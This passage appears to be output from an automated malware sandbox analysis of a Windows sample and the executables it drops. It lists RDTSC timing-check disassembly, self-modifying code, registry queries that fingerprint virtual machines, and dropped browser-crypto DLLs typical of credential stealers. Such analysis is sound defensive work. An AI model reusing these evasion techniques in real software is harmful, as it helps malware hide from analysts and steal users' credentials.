                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F092E second address: 49F094A instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F7E2CEB1B1Dh 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F094A second address: 49F0950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0950 second address: 49F0A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CEB1B1Bh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov esi, 00F240BBh 0x00000016 pushfd 0x00000017 jmp 00007F7E2CEB1B20h 0x0000001c adc al, 00000008h 0x0000001f jmp 00007F7E2CEB1B1Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F7E2CEB1B26h 0x0000002c push eax 0x0000002d jmp 00007F7E2CEB1B1Bh 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 mov esi, 28B4A07Bh 0x00000039 mov ebx, esi 0x0000003b popad 0x0000003c push dword ptr [ebp+14h] 0x0000003f pushad 0x00000040 movzx eax, dx 0x00000043 movsx ebx, ax 0x00000046 popad 0x00000047 push dword ptr [ebp+10h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F7E2CEB1B29h 0x00000052 pop esi 0x00000053 call 00007F7E2CEB1B21h 0x00000058 pop ecx 0x00000059 popad 0x0000005a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A05 second address: 49F0A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A68 second address: 49F0A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CEC second address: 4A00CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CF0 second address: 4A00CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CF6 second address: 4A00D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 xor ecx, 31F2F848h 0x0000000f jmp 00007F7E2CEC3D3Bh 0x00000014 popfd 0x00000015 jmp 00007F7E2CEC3D48h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D3C second address: 4A00D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A20 second address: 4A00A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A24 second address: 4A00A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A2A second address: 4A00A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D47h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A5A second address: 4A00A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A60 second address: 4A00A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A6F second address: 4A00AEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F7E2CEB1B21h 0x0000000d xor eax, 626D3B56h 0x00000013 jmp 00007F7E2CEB1B21h 0x00000018 popfd 0x00000019 movzx esi, bx 0x0000001c popad 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F7E2CEB1B23h 0x00000024 mov ebp, esp 0x00000026 jmp 00007F7E2CEB1B26h 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7E2CEB1B27h 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AEB second address: 4A00AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AF1 second address: 4A00AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80654 second address: 4A8065A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8065A second address: 4A806BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F7E2CEB1B24h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F7E2CEB1B20h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7E2CEB1B1Dh 0x00000021 xor ecx, 3F4D9876h 0x00000027 jmp 00007F7E2CEB1B21h 0x0000002c popfd 0x0000002d mov eax, 119D8367h 0x00000032 popad 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A806BB second address: 4A806DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 58FEh 0x00000007 call 00007F7E2CEC3D3Fh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A806DC second address: 4A806EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70ABC second address: 4A70AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AC2 second address: 4A70AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AC6 second address: 4A70ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CEC3D3Ah 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70ADD second address: 4A70AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AE3 second address: 4A70AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AE7 second address: 4A70B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CEB1B29h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 movsx ebx, ax 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70892 second address: 4A70896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70896 second address: 4A708DE instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CEB1B1Fh 0x00000010 sub ch, FFFFFFAEh 0x00000013 jmp 00007F7E2CEB1B29h 0x00000018 popfd 0x00000019 push eax 0x0000001a mov si, bx 0x0000001d pop edi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edi, cx 0x00000026 mov di, si 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A708DE second address: 4A708F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1011F second address: 4A10124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10124 second address: 4A1013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1013C second address: 4A10140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CA9 second address: 4A70CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CAF second address: 4A70CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F7E2CEB1B1Ch 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CD9 second address: 4A70CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D43h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CF0 second address: 4A70D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7E2CEB1B1Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007F7E2CEB1B1Eh 0x00000019 mov eax, 63BD58F1h 0x0000001e popad 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CEB1B23h 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D4D second address: 4A70D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D65 second address: 4A70D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D82 second address: 4A70D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D88 second address: 4A70D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D8C second address: 4A70D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D90 second address: 4A70DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F7E2CEB1B19h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70DA7 second address: 4A70DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70DAD second address: 4A70DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70DB3 second address: 4A70DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70DB7 second address: 4A70DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B28h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70DDA second address: 4A70DFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ch, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CEC3D42h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459443 second address: 459449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459449 second address: 45945C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnc 00007F7E2CEC3D36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45945C second address: 459469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F7E2CEB1B16h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206A5 second address: 4A206A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206A9 second address: 4A206AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206AD second address: 4A206B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207D1 second address: 4A207E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B24h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207E9 second address: 4A20810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CEC3D42h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2AEFDF instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 44E5EF instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4D3AD6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 101EFDF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11BE5EF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 1243AD6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: 8259D9 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: 825A8F instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: 9D59AE instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: 82337E instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: 9DAEE4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeSpecial instruction interceptor: First address: A5B4EF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeSpecial instruction interceptor: First address: 85671C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeMemory allocated: 16D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeMemory allocated: 31C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeMemory allocated: 51C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A70DA1 rdtsc 0_2_04A70DA1
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2724Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 533Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1837Jump to behavior
                      Source: C:\Windows\System32\audiodg.exeWindow / User API: threadDelayed 913
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9269
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 351
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1127
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1065
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1125
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1116
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1124
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeWindow / User API: threadDelayed 1139
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWindow / User API: threadDelayed 9375
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\python38.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dllJump to dropped file
